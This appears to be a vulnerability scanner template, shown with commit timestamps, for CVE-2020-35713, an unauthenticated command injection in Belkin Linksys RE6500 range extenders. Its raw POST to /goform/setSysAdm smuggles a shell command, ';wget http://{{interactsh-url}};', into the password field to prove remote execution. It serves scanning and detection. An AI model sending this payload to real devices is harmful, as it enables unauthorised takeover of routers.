2021-07-15 09:10:11 +00:00
id : CVE-2020-35713
info :
2022-04-29 19:58:07 +00:00
name : Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution
2021-07-15 09:10:11 +00:00
author : gy741
severity : critical
2022-05-17 09:18:12 +00:00
description : Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
2022-04-22 10:38:41 +00:00
reference :
2022-04-29 19:58:07 +00:00
- https://downloads.linksys.com/support/assets/releasenotes/ExternalReleaseNotes_RE6500_1.0.012.001.txt
2022-04-22 10:38:41 +00:00
- https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html
2022-04-29 19:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-35713
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-35713
cwe-id : CWE-78
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,linksys,rce,oast,router
2021-07-15 09:10:11 +00:00
requests :
- raw :
- |
POST /goform/setSysAdm HTTP/1.1
Host : {{Hostname}}
Accept : */*
2021-09-08 12:17:19 +00:00
Origin : {{BaseURL}}
Referer : {{BaseURL}}/login.shtml
2021-07-15 09:10:11 +00:00
admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
2022-04-29 19:58:07 +00:00
# Enhanced by mp on 2022/04/28